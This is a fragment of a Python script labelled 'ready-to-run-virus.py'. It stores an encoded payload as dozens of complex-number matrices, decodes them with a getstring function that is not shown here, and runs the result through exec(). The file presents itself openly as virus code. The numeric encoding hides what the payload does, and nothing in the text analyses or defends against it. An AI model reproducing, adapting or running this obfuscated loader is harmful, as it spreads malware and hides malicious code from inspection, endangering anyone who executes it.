M.append([(103.698011918+7.61417448419j),(1.03458133481+8.90916375389j),(-3.48011848753-20.8439763022j),(-4.27634434474-2.4219981373j),(95.4214863916-0.910931121638j),(15.8204415785+7.91658486393j),(9.29651984576+2.703451416j),(22.5077946172-2.15903828585j),(53.8805016908-0.703243362551j),]) M.append([(77.6414666993+15.1522102227j),(14.6714607894-16.9986327794j),(23.304360638-20.7746953994j),(-36.1251267655+57.6929874361j),(106.5981008-55.8055147282j),(18.1936465113-72.2305722901j),(52.7091585646-29.2894931777j),(-23.143585193+42.8598869338j),(65.760432501+46.6533045055j),]) M.append([(86.1147513994+98.8877785995j),(59.4321475124-33.8598956187j),(-82.4774981607+43.5454905734j),(73.8765980876-93.1997009662j),(16.8901711952+2.72562243901j),(115.479176965+3.12637965179j),(-62.1059327319-88.6371305084j),(-21.7537858116+72.6623916414j),(134.995077405-95.6134010385j),]) M.append([(71.0186501029-9.4448530614j),(-16.143146212-160.863278564j),(105.394207723+73.1462432588j),(-4.30119652699+3.86834018035j),(46.760067306+63.8740996679j),(-26.8620905959-42.3054811792j),(-6.3522944762-4.88978812017j),(-100.3803335-18.2412829406j),(129.221282591-48.4292466065j),]) M.append([(23.3011530153+2.95589992966j),(-24.2965142732+20.7113933656j),(-12.0868360311+12.1229415042j),(-6.32902173484+22.0067156949j),(55.6804578033+46.7874627548j),(10.1952951511+24.157508282j),(41.6702049013-26.5918347531j),(41.7241553834-81.2282378853j),(63.0183891813-43.7433626844j),]) M.append([(59.7804533782+12.214322514j),(12.5397024342+3.24764303406j),(3.95304290076-8.74410210164j),(3.66960414107-10.1819353336j),(49.809358448-4.27990078635j),(-6.25708763801+8.00887230921j),(4.97150518781+2.70059734037j),(3.82300841047-4.79385178922j),(57.4101881738-1.93442172769j),]) M.append([(44.6369020278+4.20451731691j),(4.87280347406-2.97846500644j),(-8.02142387066+1.37028395025j),(3.84519599846+4.63098662849j),(47.8700628459-4.05533807735j),(0.382428672958+7.92714506551j),(2.68313994071-4.7637313521j),(-8.02620242285-6.80897678454j),(55.4930351262+5.85082076044j),]) M.append([(19.2826775454-4.92847034847j),(0.071489112078-5.55060412347j),(-14.7567684783+8.66656060301j),(-4.72961140492+3.50967369477j),(30.103886215+1.48821242145j),(1.15554638368+6.80595994322j),(-8.21419791456-3.03683805176j),(-1.35717933839-2.60943853625j),(24.6134362397+9.44025792702j),]) M.append([(33.4263476105+0.762868903441j),(1.04607743349-0.544835585376j),(-0.147157778534+1.44688692879j),(1.24447219617+1.46933855603j),(31.9507174577+3.50030875911j),(-0.827076601398-0.147421447308j),(1.89598797942+2.07323368064j),(0.222039184806+2.16226446425j),(30.6229349317+1.73682233745j),]) M.append([(31.4834052878+3.46384741442j),(1.08740445748-0.362592779227j),(1.05000537419+0.114896130103j),(-0.504336088036+1.36678689942j),(32.7201307055+1.39948041802j),(0.604843313915-0.255991206305j),(0.567947331567-0.464703703388j),(-0.402601907748-0.556416446167j),(31.7964640066+1.13667216755j),]) M.append([(105.368406797+13.1972731219j),(-2.69174451413+6.13054727457j),(16.3726235194-14.3921331457j),(-2.51797073831-15.9091148678j),(106.849466437-8.25927712264j),(-18.9993785265+11.7024505718j),(2.67423095325+9.82234532181j),(-0.251656972444+7.70744957105j),(109.782126767+1.06200400078j),]) M.append([(67.7360123765-3.20281202582j),(7.33886549069-62.916435276j),(-28.0503059007-34.4948024616j),(19.390577523+9.64893008841j),(80.5614808703+34.9693269058j),(5.99349911956+32.5185202095j),(-14.9595805675-18.9236954587j),(29.3911096122-31.3408149081j),(104.702506753-25.76651488j),]) M.append([(114.36450925+15.6987510757j),(-47.1480813853-20.7301660049j),(-13.8325851446+31.0480555209j),(-2.63976841259+2.39958244218j),(110.973322374-8.71416207801j),(-9.4355137456+2.16522989055j),(-3.55057666472+0.955305831414j),(5.29965000123-9.12994995533j),(101.662168376-0.984588997652j),]) M.append([(76.7087758804-40.2772029037j),(-45.0770880437+13.4890533281j),(42.6995294247-31.7627048555j),(13.2721877693-35.2247013738j),(15.2103885545+20.6118546948j),(19.8387104294-30.3124981594j),(-35.8558829512+33.4234621127j),(40.5283644052-7.69681513028j),(-0.919164434849+25.6653482089j),]) M.append([(31.687474373+1.92652160615j),(-1.00530337722+0.147557888838j),(-0.118807946143+0.216341618083j),(0.619744277784-0.262018136774j),(32.3604056476+1.67306147445j),(0.0739839848054-0.636047168076j),(-0.285715513378+0.157690760527j),(0.177508714319-0.640223799253j),(31.9521199793+2.4004169194j),]) M.append([(32.1898388367+2.21985708305j),(0.221513526004-0.603662599148j),(0.471747768974+0.0568362967672j),(-0.852795290759-0.757886868272j),(31.8064647517+1.87618623535j),(-0.11819863074-1.01835103649j),(-0.468913457944-0.0679975726049j),(0.357905312457-0.0925484439778j),(32.0036964117+1.9039566816j),]) M.append([(39.9741120988+38.7894784451j),(41.0143597336-14.6640454388j),(17.8329663678-11.9436210361j),(24.3661626232+63.041478384j),(100.947199986-33.3593125076j),(27.3764735208-24.863695619j),(-5.89389314294+15.2663793656j),(16.9410161613+3.42717087012j),(41.0786879149+0.569834062516j),]) M.append([(54.8394547026-34.3524720583j),(9.83401764493-47.4700508086j),(-38.1468796287+34.0500687065j),(11.1041943514+3.6450430046j),(105.098943002+12.4772897586j),(5.50627461325-5.38377716102j),(-28.3621773651+11.2311017424j),(-20.3698960033-17.129657878j),(105.061602295+27.8751822996j),]) M.append([(107.510160134-0.669702682743j),(0.279110311351-3.20538018288j),(-0.538591391216-2.77660104823j),(0.114452838931+7.95940749853j),(106.472320399+4.55158656306j),(-3.67588277411+2.82205909714j),(-1.15526948212+1.56290066676j),(-3.09957161338+0.849181818426j),(110.017519467+2.11811611968j),]) M.append([(104.252024922+6.42904399738j),(5.51727505042-4.60108717294j),(-5.53810405368+1.41508974786j),(17.2492480303+8.18450375694j),(92.5109162059+0.114562031647j),(33.1838320817+13.0235459722j),(-8.1396273051-9.7464298014j),(8.62814393094-8.83406888172j),(50.2370588722-0.543606029027j),]) M.append([(104.066368393-18.7702207162j),(10.8931143158-3.40474814027j),(-4.79790591833-9.54896263122j),(8.21615133048+3.26475335022j),(93.0460828463+5.04686453559j),(3.59026685785-2.28040096352j),(-32.3921183476+21.6079213368j),(-19.4645840767-1.72353214929j),(91.8875487607+19.7233561806j),]) M.append([(41.9662759917+7.54903066024j),(-8.79159366761+6.15111143888j),(11.7786449032-4.96988076186j),(-8.9788276892-0.169286839765j),(39.3216320619-5.13080657299j),(-7.90975493835+8.69823737279j),(-1.50623194057-1.81106923101j),(4.90314610432-2.1550089748j),(28.7120919464+3.58177591275j),]) M.append([(41.2625710623-2.59764315615j),(-4.30870123276+5.74449513644j),(7.9725856261-5.44399166906j),(-41.2095309919-2.22583588591j),(85.0006508731+4.43654508749j),(-29.348662978-55.7232894231j),(10.8151097054-14.957030858j),(-13.8449698301+20.716765107j),(67.7367780646+4.16109806867j),]) M.append([(35.6542556746+2.38211167238j),(16.9911453385+3.71387612479j),(-11.9549920705+6.13855899141j),(-2.03947608784-1.53800273449j),(23.2293814554-6.26432541759j),(9.29940403797+0.625677208306j),(4.7868117298+0.0726024498338j),(22.5922502033+7.76996309453j),(15.11636287+9.88221374522j),]) M.append([(31.0628025281+1.3910156942j),(-0.57574746179-0.236616599494j),(-0.373113993458+0.742043346495j),(1.97595709022+0.0187644696941j),(32.5359083999+2.12552428943j),(-0.150514421065-1.32290171181j),(-0.808167832138+0.574451118707j),(-0.335467998342-0.110106880818j),(32.4012890719+2.48346001637j),]) M.append([(31.786036659+2.2154744389j),(-0.338076988217-0.534722532719j),(0.889334855058-0.534591986597j),(-0.194215278616-0.275229596602j),(31.9700245974+1.67492329234j),(1.0870435475+0.438236361753j),(0.237385442281-0.491840621021j),(-0.542607681274+0.56559719918j),(32.2439387436+2.10960226875j),]) M.append([(113.774541614+12.5937252495j),(-6.71320883418+43.2470764074j),(-7.57782027503-26.5777098132j),(-5.53022425166+4.48007307642j),(75.1583809813+1.00704976811j),(18.1390302164-6.64645250751j),(-9.52686767161+11.9017683562j),(-48.1722464247-4.74481507278j),(133.067077405-7.60077501761j),]) M.append([(130.700243484-137.614957225j),(35.4243355388+225.379982905j),(42.8766802706+33.9599668624j),(58.1655610684-106.758452366j),(69.6905072566+190.411775751j),(22.9996602284+38.4033263725j),(-56.6597019249+157.805407383j),(26.7735308081-268.553141667j),(78.609249259-46.7968185254j),]) M.append([(107.81970798+2.90023122574j),(2.13416722659+6.18398749113j),(0.184029728107-2.93461786448j),(4.94608741279-9.15727329751j),(112.04103088-10.1768831601j),(-5.67148012884+7.63470899708j),(-0.381139040638-11.3670711127j),(-0.158496887292-18.0903475446j),(102.13926114+13.2766519344j),]) M.append([(45.8826618866-2.14812613934j),(-10.3691010961+66.1515598057j),(17.971497652+68.8308249104j),(0.400413711067+12.7859563545j),(130.293999993+5.33828423153j),(14.3319851047-20.9561628768j),(-1.54788298291-14.7086271082j),(-10.8639579901-0.0448217621848j),(86.8233381201+2.80984190781j),]) M.append([(110.272359157+2.95618147432j),(-0.593776905484-0.494719321765j),(0.413169524434-4.70739642713j),(0.396055564607+0.0367579554574j),(111.102851951+3.48203609211j),(-1.52966754469+1.80810620405j),(3.89342642179+7.44846325951j),(-4.63304576557-0.632793912124j),(102.624788893-0.438217566431j),]) M.append([(86.0470820374-3.44884800547j),(-20.7992535336-6.64045818176j),(-8.14805267752+14.7915032636j),(-32.7262347208+3.21095735706j),(49.2839359121+6.54907732448j),(-1.00073123261+35.5930685447j),(0.225864460791+7.16338020541j),(0.130756618754+10.2676018544j),(108.66898205+2.89977068098j),]) M.append([(102.930154189-19.2049286805j),(25.4370484821+10.7345935298j),(39.6944935358+1.75230384365j),(36.886906588+9.80029135855j),(85.111341756+42.6338711934j),(7.13963745819+61.7560474323j),(-21.5494315098+10.1015787355j),(-16.5749886211-35.4163995653j),(47.9585040553-17.4289425129j),]) M.append([(24.6906973506+7.29877557686j),(-13.0204715735+9.26612398535j),(10.0151926071+11.6440986491j),(-7.69484242408-1.0825849941j),(23.8460527571+6.07615139814j),(6.94903113241+7.61244167001j),(8.85815671875-2.7184793526j),(8.31786325288+1.11913604773j),(36.4632498923-7.374926975j),]) M.append([(31.9225750172+2.90541696478j),(-0.97609843558+2.96487071859j),(3.7118481268+1.87009559836j),(3.3188763714+0.798379562177j),(42.3250607092+2.97587306509j),(3.50957601321-13.0620153236j),(0.297560801166-2.16858199917j),(0.213259957743-7.99719942592j),(21.7523642736+0.11870997013j),]) M.append([(31.6960588415+2.42106050815j),(-0.110930396723-0.1762188461j),(-0.0812107607892+0.342085849199j),(-0.403359080954+0.0233236238538j),(32.375279676+2.17265678477j),(-0.219791822327-0.252549448269j),(1.25762247283+1.46236091066j),(1.36958539585+0.0601997894266j),(31.9286614825+1.40628270708j),]) M.append([(53.8406977979+2.290786953j),(-18.9488415957+19.9516263211j),(16.5108623372+13.7924447894j),(-30.4014146298-24.4133709298j),(80.5414083726-7.15629633582j),(-8.27777074118-37.4397779994j),(17.8817799733-3.01067686194j),(-13.1993267127+19.5105599792j),(47.6178938295+10.8655093828j),]) M.append([(99.9365169714-0.650021914853j),(1.5713553326-1.60660089692j),(-4.06083472747+6.11984591174j),(0.966398644643+7.55353299773j),(86.6242479458+0.086896657896j),(12.9703385091+34.7596174341j),(-10.6946104438-8.0449670945j),(8.49749660421-14.712984532j),(63.4392350827+6.56312525696j),]) M.append([(113.90821283+2.45551107095j),(1.16985516925-1.18336468842j),(6.08010571255-2.07747874733j),(-8.81779689893-2.10121737289j),(113.532022523-1.50985006618j),(3.03087770379-3.18690147889j),(9.30897316981-0.121927211852j),(0.937104171419+3.29850251664j),(110.559764648+5.05433899523j),]) M.append([(84.7297622577+0.103946543807j),(14.6980587612+15.4640859444j),(-7.72084838917-16.9200176709j),(30.8614820255-19.4132957888j),(93.6212134554+13.8720585214j),(-16.4193303955+19.0120932202j),(17.9505457167+37.6111838994j),(-6.44784797275-17.2097600425j),(78.6490242869-7.97600506517j),]) M.append([(52.544831307-6.48329366386j),(40.2411853702+3.12179531585j),(-0.54241726235+2.88792032506j),(14.3489026017-24.3703509064j),(96.9424891385+21.3282326798j),(-8.65675202828-5.71802437809j),(69.6622975109+28.5386798241j),(-61.2973907476-8.26382047134j),(108.512679555-8.8449390159j),]) M.append([(32.5381312348+2.43513242195j),(-2.54209285544-4.82031273101j),(1.92749622114+3.05381634183j),(0.405073026475-1.51485675043j),(17.9727552081+1.34580863291j),(10.0279043274-2.09896281811j),(-0.185321069658+1.24633878639j),(11.1624382218+3.40535390432j),(23.4891135571+2.21905894514j),]) M.append([(31.6516318375+1.57462827947j),(-0.489081978746-0.485694634065j),(-0.220216693601-0.62233466289j),(1.01053656223-0.584424542958j),(32.0588484425+2.37531344146j),(-0.295160680015+0.204299351843j),(0.149733019863-0.105936018674j),(0.292104921306-0.102972934738j),(32.28951972+2.05005827907j),]) M.append([(95.2933484289-35.5181134194j),(40.0833526915-11.9091647345j),(-6.71122933447-13.6103036077j),(46.2131352104+84.5136860013j),(26.708700471+24.0934188875j),(20.8132871526+34.2734796188j),(62.2420657407+39.1594284223j),(-49.8335560913+47.4392157877j),(132.9979511+17.4246945319j),]) M.append([(97.6940656641-13.3620715481j),(-5.40622636043+2.92360077842j),(-6.2343845357+15.4156355676j),(-39.2610098991-28.9049819321j),(91.4590866615+17.0131502649j),(30.6455357053+41.2352536886j),(41.9266266219-10.9833896389j),(-5.17849104154-14.1681403996j),(54.8468476744+2.34892128326j),]) M.append([(62.4152544283-14.5974447027j),(-23.8586574052+5.93292572674j),(3.01820586861-38.0966353283j),(17.4344211455+44.4664187366j),(128.209557926+15.929734408j),(-29.7817185747+22.1171406616j),(16.2784376208-41.117932448j),(-3.60480494377-22.0263034006j),(143.375187646+4.66771029479j),]) M.append([(60.7214230851+28.9133924432j),(55.8504201881-25.7766389302j),(-5.59244249227+40.3311547335j),(21.0742070708-0.77844550335j),(48.346928314-36.6270916963j),(18.6869915666+19.0102451996j),(24.897980231-11.9946585812j),(-11.6276679331-50.5441353984j),(72.9316486009+13.713699253j),]) M.append([(33.5651274071+2.10955250389j),(-0.282782210592-0.56177994374j),(0.0709989390886-0.997890586324j),(0.461922587384-2.59267483755j),(31.295674303+1.35271657572j),(-1.8909236493+0.653382716568j),(-0.708375572626-1.56366061496j),(-0.539008355608+0.466348857442j),(31.1391982899+2.53773092039j),]) M.append([(32.9887790559+1.80911813801j),(-0.733372975497-0.633700517323j),(-0.985400056573+0.0393896769207j),(0.502067352962-1.04782822582j),(31.7150735025+2.69629659015j),(-0.71160969362+1.14260263781j),(0.655744149135+0.429429108753j),(-0.133976529539-0.184819261419j),(31.2961474417+1.49458527184j),]) myMTXcode=getstring(M) exec(myMTXcode) - - - - - - - - - - - - - [ready-to-run-virus.py] - - - - - - - - - - - - - -